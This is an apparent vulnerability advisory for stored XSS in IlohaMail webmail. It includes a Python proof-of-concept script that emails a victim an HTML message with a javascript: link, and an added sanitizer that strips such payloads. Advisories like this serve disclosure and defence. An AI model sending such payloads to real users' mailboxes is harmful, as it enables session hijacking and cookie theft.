Release date: 2012-08-18
Updated: 2012-08-23
Affected systems:
sourceforge IlohaMail 0.9-20050415
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 55096
IlohaMail is a lightweight, feature-rich, multilingual webmail system.
IlohaMail 0.9-20050415 and other versions contain multiple HTML injection vulnerabilities in their implementation. Exploiting them allows an attacker to execute HTML and script code in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered.
<*Source: Shai rod *>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching purposes. Use at your own risk!
Shai rod () provided the following test method:
import smtplib

print("###############################################")
print("# IlohaMail Stored XSS POC #")
print("# Coded by: Shai rod #")
print("# @NightRang3r #")
print("# #")
print("# For Educational Purposes Only! #")
print("###############################################\r\n")

# SETTINGS
sender = "attacker@localhost"
smtp_login = sender
smtp_password = "qwe123"
recipient = "victim@localhost"
smtp_server = "192.168.1.10"
smtp_port = 25
subject = "IlohaMail Webmail XSS POC"

# SEND E-MAIL
print("[*] Sending E-mail to " + recipient + "...")
# Headers use CRLF throughout (the original mixed "\n" and "\r\n"), and the
# recipient is a single address string: the original's ", ".join(recipient)
# joined its characters and produced a malformed To: header.
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\n" % (sender, recipient, subject)
msg += "Content-type: text/html\r\n\r\n"
# The body is an HTML link with a javascript: URL; a webmail client that
# renders the message without filtering runs the script when it is clicked.
msg += """<a href=javascript:alert("XSS")>Click Me, Please...</a>\r\n"""

server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo()
server.starttls()
server.login(smtp_login, smtp_password)
server.sendmail(sender, recipient, msg)
server.quit()
print("[+] E-mail sent!")
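For contrast, the following is an added defender-side example (not part of the advisory and not IlohaMail's code) showing the kind of filtering that neutralizes the payload above: the HTML body of an incoming message is rebuilt with javascript: URLs, event-handler attributes and script-bearing elements removed. The sanitizer class, the allowed-scheme list and the sample inputs are assumptions constructed for this example.

```python
import html
from html.parser import HTMLParser

# href/src may only use these schemes; "javascript:" and everything else is dropped.
SAFE_SCHEMES = ("http:", "https:", "mailto:")
DROP_TAGS = {"script", "style", "iframe", "object", "embed"}  # content never rendered


class EmailHtmlSanitizer(HTMLParser):
    """Rebuilds message HTML, keeping only attributes that cannot run script."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_TAGS:
            self.skip_depth += 1
            return
        if self.skip_depth:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):  # onclick, onload, ... event handlers
                continue
            # Whitespace-strip and lower-case before the scheme check so that
            # "java\tscript:"-style obfuscation is rejected as well.
            if name in ("href", "src") and not "".join(value.split()).lower().startswith(SAFE_SCHEMES):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif not self.skip_depth:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data))  # re-escape so text stays text


def sanitize_email_html(body):
    """Return the HTML mail body with script-capable constructs removed."""
    parser = EmailHtmlSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)
```

Run on the PoC body, the link survives as plain text while its javascript: href is dropped; relative URLs are dropped too, which is the conservative choice for mail.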
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
sourceforge
-----------
The vendor has not yet released a patch or upgrade. We recommend that users of this software monitor the vendor's homepage for the latest version: